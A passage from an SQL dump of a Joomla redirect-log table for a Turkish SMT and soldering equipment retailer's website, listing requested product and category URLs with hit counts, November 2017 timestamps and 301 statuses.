00:00:00',301),(8652,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',363,0,'2017-11-05 04:48:07','0000-00-00 00:00:00',301),(8653,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',355,0,'2017-11-05 04:48:09','0000-00-00 00:00:00',301),(8654,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',372,0,'2017-11-05 04:48:10','0000-00-00 00:00:00',301),(8655,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',386,0,'2017-11-05 04:48:12','0000-00-00 00:00:00',301),(8656,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',359,0,'2017-11-05 04:48:14','0000-00-00 00:00:00',301),(8657,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',386,0,'2017-11-05 04:48:15','0000-00-00 00:00:00',301),(8658,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',363,0,'2017-11-05 04:48:17','0000-00-00 00:00:00',301),(8659,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',364,0,'2017-11-05 04:48:19','0000-00-00 00:00:00',301),(8660,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',356,0,'2017-11-05 04:48:20','0000-00-00 00:00:00',301),(8661,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',379,0,'2017-11-05 04:48:22','0000-00-00 00:00:00',301),(8662,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',359,0,'2017-11-05 04:48:23','0000-00-00 00:00:00',301),(8663,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',376,0,'2017-11-05 04:48:25','0000-00-00 00:00:00',301),(8664,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',364,0,'2017-11-05 04:48:27','0000-00-00 00:00:00',301),(8665,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',371,0,'2017-11-05 04:48:28','0000-00-00 00:00:00',301),(8666,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',363,0,'2017-11-05 04:48:30','0000-00-00 00:00:00',301),(8667,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',367,0,'2017-11-05 04:48:32','0000-00-00 00:00:00',301),(8668,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,`p`.product_sku',NULL,'','',352,0,'2017-11-05 04:48:33','0000-00-00 00:00:00',301),(8669,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',350,0,'2017-11-05 04:48:35','0000-00-00 00:00:00',301),(8670,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,category_name',NULL,'','',372,0,'2017-11-05 04:48:37','0000-00-00 00:00:00',301),(8671,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',348,0,'2017-11-05 04:48:38','0000-00-00 00:00:00',301),(8672,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,mf_name',NULL,'','',374,0,'2017-11-05 04:48:40','0000-00-00 00:00:00',301),(8673,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',349,0,'2017-11-05 04:48:42','0000-00-00 00:00:00',301),(8674,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,ordering',NULL,'','',351,0,'2017-11-05 04:48:43','0000-00-00 00:00:00',301),(8675,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',347,0,'2017-11-05 04:48:45','0000-00-00 00:00:00',301),(8676,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/asp-300-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-05 05:03:41','0000-00-00 00:00:00',301),(8677,'http://www.3s-technologies.com.tr/tr/urunler',NULL,'','',201,0,'2017-11-05 05:16:34','0000-00-00 00:00:00',301),(8678,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/users-component/index.php',NULL,'http://www.3s-technologies.com.tr/index.php','',10,0,'2017-11-05 06:19:51','0000-00-00 00:00:00',301),(8679,'http://www.3s-technologies.com.tr/en/contacts-en',NULL,'http://www.3s-technologies.com.tr/en/','',102,0,'2017-11-05 06:34:11','0000-00-00 00:00:00',301),(8680,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim',NULL,'','',48,0,'2017-11-05 06:34:43','0000-00-00 00:00:00',301),(8681,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı',NULL,'','',407,0,'2017-11-05 06:38:25','0000-00-00 00:00:00',301),(8682,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı',NULL,'','',553,0,'2017-11-05 06:42:50','0000-00-00 00:00:00',301),(8683,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-33-34-detail/askquestion?tmpl=component',NULL,'','',15,0,'2017-11-05 07:08:45','0000-00-00 00:00:00',301),(8684,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-05 07:10:10','0000-00-00 00:00:00',301),(8685,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,ordering?language=en-gb',NULL,'','',3,0,'2017-11-05 07:12:27','0000-00-00 00:00:00',301),(8686,'http://3s-technologies.com.tr/tr/ueruenler',NULL,'','',10,0,'2017-11-05 07:19:19','0000-00-00 00:00:00',301),(8687,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/cm-602-l-detail',NULL,'','',327,0,'2017-11-05 07:19:34','0000-00-00 00:00:00',301),(8688,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/mx200lp-3-detail',NULL,'','',85,0,'2017-11-05 07:24:08','0000-00-00 00:00:00',301),(8689,'http://3s-technologies.com.tr/tr/?option=com_foxcontact',NULL,'','',3,0,'2017-11-05 07:24:36','0000-00-00 00:00:00',301),(8690,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri/trident-detail',NULL,'','',28,0,'2017-11-05 07:26:17','0000-00-00 00:00:00',301),(8691,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/rh2-20-detail',NULL,'','',53,0,'2017-11-05 07:28:01','0000-00-00 00:00:00',301),(8692,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri',NULL,'','',60,0,'2017-11-05 07:34:52','0000-00-00 00:00:00',301),(8693,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/mi-300-detail',NULL,'','',22,0,'2017-11-05 07:39:10','0000-00-00 00:00:00',301),(8694,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',14,0,'2017-11-05 07:51:41','0000-00-00 00:00:00',301),(8695,'http://3s-technologies.com.tr/index.php/en/products/am100-detail?print=1&tmpl=component',NULL,'','',4,0,'2017-11-05 07:54:26','0000-00-00 00:00:00',301),(8696,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız',NULL,'','',406,0,'2017-11-05 08:01:17','0000-00-00 00:00:00',301),(8697,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-11-05 08:06:32','0000-00-00 00:00:00',301),(8698,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae',NULL,'','',48,0,'2017-11-05 08:08:07','0000-00-00 00:00:00',301),(8699,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,mf_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-05 08:16:07','0000-00-00 00:00:00',301),(8700,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-11-05 08:29:53','0000-00-00 00:00:00',301),(8701,'http://3s-technologies.com.tr/tr/hakk-m-zda',NULL,'','',1,0,'2017-11-05 08:35:06','0000-00-00 00:00:00',301),(8702,'http://3s-technologies.com.tr/en/products/thru-hole/by,mf_name',NULL,'','',12,0,'2017-11-05 08:39:26','0000-00-00 00:00:00',301),(8703,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,mf_name',NULL,'','',44,0,'2017-11-05 08:42:30','0000-00-00 00:00:00',301),(8704,'http://3s-technologies.com.tr/tr/urunler/screen-printer',NULL,'','',46,0,'2017-11-05 08:48:58','0000-00-00 00:00:00',301),(8705,'http://www.3s-technologies.com.tr/tr/images/pdf/le_benchtop_automated_pick-place.pdf',NULL,'','',55,0,'2017-11-05 08:52:39','0000-00-00 00:00:00',301),(8706,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-05 09:14:59','0000-00-00 00:00:00',301),(8707,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-05 09:25:01','0000-00-00 00:00:00',301),(8708,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/955lc-37-detail',NULL,'','',10,0,'2017-11-05 09:31:35','0000-00-00 00:00:00',301),(8709,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim',NULL,'','',42,0,'2017-11-05 09:37:27','0000-00-00 00:00:00',301),(8710,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',536,0,'2017-11-05 09:37:43','0000-00-00 00:00:00',301),(8711,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,category_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-05 09:41:12','0000-00-00 00:00:00',301),(8712,'http://3s-technologies.com.tr/tr/ueruenler/thru-hole',NULL,'','',9,0,'2017-11-05 09:50:52','0000-00-00 00:00:00',301),(8713,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',541,0,'2017-11-05 10:01:43','0000-00-00 00:00:00',301),(8714,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail',NULL,'','',25,0,'2017-11-05 10:02:18','0000-00-00 00:00:00',301),(8715,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-05 10:04:13','0000-00-00 00:00:00',301),(8716,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim',NULL,'','',26,0,'2017-11-05 10:12:25','0000-00-00 00:00:00',301),(8717,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',404,0,'2017-11-05 10:18:54','0000-00-00 00:00:00',301),(8718,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-05 10:19:09','0000-00-00 00:00:00',301),(8719,'https://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail',NULL,'','',1,0,'2017-11-05 10:29:54','0000-00-00 00:00:00',301),(8720,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_name',NULL,'','',28,0,'2017-11-05 10:56:43','0000-00-00 00:00:00',301),(8721,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/spartan-8s-8d-44-detail',NULL,'','',10,0,'2017-11-05 10:58:58','0000-00-00 00:00:00',301),(8722,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/kester',NULL,'','',60,0,'2017-11-05 11:03:34','0000-00-00 00:00:00',301),(8723,'http://3s-technologies.com.tr/tr/ueruenler/konveyorler',NULL,'','',9,0,'2017-11-05 11:06:41','0000-00-00 00:00:00',301),(8724,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-41-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-05 11:09:49','0000-00-00 00:00:00',301),(8725,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,category_name/results,1-20',NULL,'','',1,0,'2017-11-05 11:32:13','0000-00-00 00:00:00',301),(8726,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim',NULL,'','',59,0,'2017-11-05 13:00:10','0000-00-00 00:00:00',301),(8727,'http://www.3s-technologies.com.tr/en/products',NULL,'','',124,0,'2017-11-05 13:25:34','0000-00-00 00:00:00',301),(8728,'http://3s-technologies.com.tr/tr/ueruenler/screen-printer',NULL,'','',9,0,'2017-11-05 13:38:14','0000-00-00 00:00:00',301),(8729,'http://3s-technologies.com.tr/en/?option=com_content&view=category&layout=blog&id=1&itemid=50&lang=en/',NULL,'','',1,0,'2017-11-05 14:51:50','0000-00-00 00:00:00',301),(8730,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı',NULL,'','',396,0,'2017-11-05 14:57:23','0000-00-00 00:00:00',301),(8731,'http://3s-technologies.com.tr/index.php/en/products/mi-300-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-05 15:45:03','0000-00-00 00:00:00',301),(8732,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae',NULL,'','',15,0,'2017-11-05 15:47:26','0000-00-00 00:00:00',301),(8733,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/cm-602-l-detail',NULL,'','',209,0,'2017-11-05 15:51:20','0000-00-00 00:00:00',301),(8734,'http://www.3s-technologies.com.tr/tr/urunler/ess-310-detail?tmpl=component&print=1',NULL,'','',38,0,'2017-11-05 15:58:16','0000-00-00 00:00:00',301),(8735,'http://www.3s-technologies.com.tr/en/products/rh2-detail?tmpl=component&print=1',NULL,'','',39,0,'2017-11-05 16:04:56','0000-00-00 00:00:00',301),(8736,'http://3s-technologies.com.tr/tr/ueruenler/smd-ultra-hız',NULL,'','',15,0,'2017-11-05 16:09:46','0000-00-00 00:00:00',301),(8737,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',205,0,'2017-11-05 16:18:37','0000-00-00 00:00:00',301),(8738,'http://3s-technologies.com.tr/tr/ueruenler/manufacturers/aqueous',NULL,'','',9,0,'2017-11-05 16:24:45','0000-00-00 00:00:00',301),(8739,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-11-05 16:25:27','0000-00-00 00:00:00',301),(8740,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,ordering?language=tr-tr',NULL,'','',2,0,'2017-11-05 16:29:51','0000-00-00 00:00:00',301),(8741,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-05 16:36:10','0000-00-00 00:00:00',301),(8742,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim',NULL,'','',39,0,'2017-11-05 16:38:43','0000-00-00 00:00:00',301),(8743,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name?language=en-gb',NULL,'','',17,0,'2017-11-05 16:41:22','0000-00-00 00:00:00',301),(8744,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',8,0,'2017-11-05 16:50:21','0000-00-00 00:00:00',301),(8745,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-05 16:55:38','0000-00-00 00:00:00',301),(8746,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/dirdesc',NULL,'','',39,0,'2017-11-05 17:00:22','0000-00-00 00:00:00',301),(8747,'http://3s-technologies.com.tr/en/using-joomla/extensions/modules/content-modules/most-read/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',9,0,'2017-11-05 17:02:19','0000-00-00 00:00:00',301),(8748,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-41-detail',NULL,'','',33,0,'2017-11-05 17:03:59','0000-00-00 00:00:00',301),(8749,'http://www.3s-technologies.com.tr/en/products/dalga-lehim',NULL,'','',68,0,'2017-11-05 17:05:26','0000-00-00 00:00:00',301),(8750,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/trident-detail',NULL,'','',60,0,'2017-11-05 17:13:32','0000-00-00 00:00:00',301),(8751,'http://www.3s-technologies.com.tr/tr/ueruenler/smd-ultra-hız',NULL,'','',26,0,'2017-11-05 17:13:39','0000-00-00 00:00:00',301),(8752,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-05 17:16:55','0000-00-00 00:00:00',301),(8753,'http://3s-technologies.com.tr/tr/ueruenler/smd-fırın',NULL,'','',9,0,'2017-11-05 17:25:33','0000-00-00 00:00:00',301),(8754,'http://3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-detail',NULL,'','',22,0,'2017-11-05 17:36:33','0000-00-00 00:00:00',301),(8755,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,mf_name?language=tr-tr',NULL,'','',19,0,'2017-11-05 17:51:56','0000-00-00 00:00:00',301),(8756,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name?language=en-gb',NULL,'','',7,0,'2017-11-05 17:53:06','0000-00-00 00:00:00',301),(8757,'http://www.3s-technologies.com.tr/en/products/bã¶lgesel-lehimleme/ess-310-detail',NULL,'','',20,0,'2017-11-05 17:55:02','0000-00-00 00:00:00',301),(8758,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by?language=tr-tr&product_sku',NULL,'','',3,0,'2017-11-05 17:58:19','0000-00-00 00:00:00',301),(8759,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc/results,1-5',NULL,'','',6,0,'2017-11-05 18:23:47','0000-00-00 00:00:00',301),(8760,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-05 18:27:01','0000-00-00 00:00:00',301),(8761,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',6,0,'2017-11-05 18:28:07','0000-00-00 00:00:00',301),(8762,'http://3s-technologies.com.tr/tr/ueruenler/temizleme-makineleri',NULL,'','',16,0,'2017-11-05 18:41:21','0000-00-00 00:00:00',301),(8763,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',8,0,'2017-11-05 18:51:08','0000-00-00 00:00:00',301),(8764,'http://3s-technologies.com.tr/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı',NULL,'','',21,0,'2017-11-05 18:52:53','0000-00-00 00:00:00',301),(8765,'http://3s-technologies.com.tr/tr/ueruenler/manufacturer/mirae/smd-ultra-hız',NULL,'','',21,0,'2017-11-05 18:53:58','0000-00-00 00:00:00',301),(8766,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,product_sku',NULL,'','',224,0,'2017-11-05 18:56:50','0000-00-00 00:00:00',301),(8767,'http://3s-technologies.com.tr/en/products/dalga-lehim',NULL,'','',36,0,'2017-11-05 18:59:51','0000-00-00 00:00:00',301),(8768,'http://www.3s-technologies.com.tr/tr/ueruenler/screen-printer',NULL,'','',26,0,'2017-11-05 19:02:36','0000-00-00 00:00:00',301),(8769,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',352,0,'2017-11-05 19:24:58','0000-00-00 00:00:00',301),(8770,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/ls60v-detail',NULL,'','',336,0,'2017-11-05 19:26:14','0000-00-00 00:00:00',301),(8771,'http://3s-technologies.com.tr/tr/ueruenler/manufacturers/mirae',NULL,'','',9,0,'2017-11-05 19:32:22','0000-00-00 00:00:00',301),(8772,'http://3s-technologies.com.tr/tr/ueruenler/lehimleme-malzemeleri',NULL,'','',16,0,'2017-11-05 19:57:07','0000-00-00 00:00:00',301),(8773,'http://3s-technologies.com.tr/tr/ueruenler/manufacturers/tolo',NULL,'','',9,0,'2017-11-05 20:03:16','0000-00-00 00:00:00',301),(8774,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',318,0,'2017-11-05 20:04:48','0000-00-00 00:00:00',301),(8775,'http://www.3s-technologies.com.tr/tr/ueruenler/manufacturers/aqueous',NULL,'','',27,0,'2017-11-05 20:05:43','0000-00-00 00:00:00',301),(8776,'http://www.3s-technologies.com.tr/en/products/thru-hole/jv131-detail',NULL,'','',55,0,'2017-11-05 20:06:17','0000-00-00 00:00:00',301),(8777,'http://www.3s-technologies.com.tr/tr/hakk-m-zda',NULL,'','',38,0,'2017-11-05 20:06:23','0000-00-00 00:00:00',301),(8778,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,product_name?language=en-gb',NULL,'','',9,0,'2017-11-05 20:13:39','0000-00-00 00:00:00',301),(8779,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-05 20:14:25','0000-00-00 00:00:00',301),(8780,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/avb-detail/askquestion?tmpl=component',NULL,'','',29,0,'2017-11-05 20:23:53','0000-00-00 00:00:00',301),(8781,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı',NULL,'','',104,0,'2017-11-05 20:24:08','0000-00-00 00:00:00',301),(8782,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim',NULL,'','',22,0,'2017-11-05 20:25:36','0000-00-00 00:00:00',301),(8783,'http://3s-technologies.com.tr/tr/ueruenler/smd-orta-hızlı',NULL,'','',8,0,'2017-11-05 20:27:39','0000-00-00 00:00:00',301),(8784,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,`p`.product_sku?language=tr-tr',NULL,'','',2,0,'2017-11-05 20:29:37','0000-00-00 00:00:00',301),(8785,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-05 20:34:36','0000-00-00 00:00:00',301),(8786,'http://3s-technologies.com.tr/index.php/tr/ueruenler/npm-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-05 20:35:10','0000-00-00 00:00:00',301),(8787,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-05 20:38:01','0000-00-00 00:00:00',301),(8788,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/955lc-37-detail/askquestion?tmpl=component',NULL,'','',27,0,'2017-11-05 20:49:54','0000-00-00 00:00:00',301),(8789,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme',NULL,'','',104,0,'2017-11-05 20:53:26','0000-00-00 00:00:00',301),(8790,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',167,0,'2017-11-05 20:54:02','0000-00-00 00:00:00',301),(8791,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,product_sku',NULL,'','',19,0,'2017-11-05 20:54:18','0000-00-00 00:00:00',301),(8792,'http://3s-technologies.com.tr/tr/ueruenler/dalga-lehim',NULL,'','',8,0,'2017-11-05 20:54:21','0000-00-00 00:00:00',301),(8793,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/rh2-detail/askquestion?tmpl=component',NULL,'','',90,0,'2017-11-05 20:58:26','0000-00-00 00:00:00',301),(8794,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı',NULL,'','',109,0,'2017-11-05 21:06:00','0000-00-00 00:00:00',301),(8795,'http://3s-technologies.com.tr/tr/ueruenler/bölgesel-lehimleme',NULL,'','',9,0,'2017-11-05 21:12:55','0000-00-00 00:00:00',301),(8796,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,category_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-05 21:21:24','0000-00-00 00:00:00',301),(8797,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/trident-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-05 21:26:54','0000-00-00 00:00:00',301),(8798,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by,`p`.product_sku?language=en-gb',NULL,'','',24,0,'2017-11-05 21:33:43','0000-00-00 00:00:00',301),(8799,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by,product_sku?language=en-gb',NULL,'','',18,0,'2017-11-05 21:35:45','0000-00-00 00:00:00',301),(8800,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,product_name?language=tr-tr',NULL,'','',7,0,'2017-11-05 21:35:46','0000-00-00 00:00:00',301),(8801,'http://www.3s-technologies.com.tr/tr/ueruenler/lehimleme-malzemeleri/flux',NULL,'','',27,0,'2017-11-05 21:59:21','0000-00-00 00:00:00',301),(8802,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,category_name?language=en-gb',NULL,'','',18,0,'2017-11-05 22:01:42','0000-00-00 00:00:00',301),(8803,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name?language=en-gb',NULL,'','',24,0,'2017-11-05 22:05:16','0000-00-00 00:00:00',301),(8804,'http://www.3s-technologies.com.tr/tr/ueruenler/manufacturers/mirae',NULL,'','',28,0,'2017-11-05 22:05:59','0000-00-00 00:00:00',301),(8805,'http://3s-technologies.com.tr/tr/ueruenler/lehimleme-malzemeleri/flux',NULL,'','',9,0,'2017-11-05 22:19:12','0000-00-00 00:00:00',301),(8806,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim-31-32-33-34-detail?print=1&tmpl=component',NULL,'','',2,0,'2017-11-05 22:19:55','0000-00-00 00:00:00',301),(8807,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-05 22:22:50','0000-00-00 00:00:00',301),(8808,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/npm-detail',NULL,'','',81,0,'2017-11-05 22:41:37','0000-00-00 00:00:00',301),(8809,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/by,category_name?language=tr-tr',NULL,'','',24,0,'2017-11-05 22:42:06','0000-00-00 00:00:00',301),(8810,'http://3s-technologies.com.tr/index.php/tr/ueruenler/245-sn63pb37-0.6mm-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-05 22:42:57','0000-00-00 00:00:00',301),(8811,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',30,0,'2017-11-05 22:46:19','0000-00-00 00:00:00',301),(8812,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim',NULL,'','',40,0,'2017-11-05 22:46:51','0000-00-00 00:00:00',301),(8813,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,mf_name',NULL,'','',374,0,'2017-11-05 22:46:56','0000-00-00 00:00:00',301),(8814,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-05 22:47:11','0000-00-00 00:00:00',301),(8815,'http://www.3s-technologies.com.tr/tr/ueruenler/smd-düşük-hızlı',NULL,'','',25,0,'2017-11-05 22:47:22','0000-00-00 00:00:00',301),(8816,'https://www.3s-technologies.com.tr/tr/component/content/category?format=feed&type=atom',NULL,'','',2,0,'2017-11-05 22:48:43','0000-00-00 00:00:00',301),(8817,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,category_name',NULL,'','',579,0,'2017-11-05 22:59:58','0000-00-00 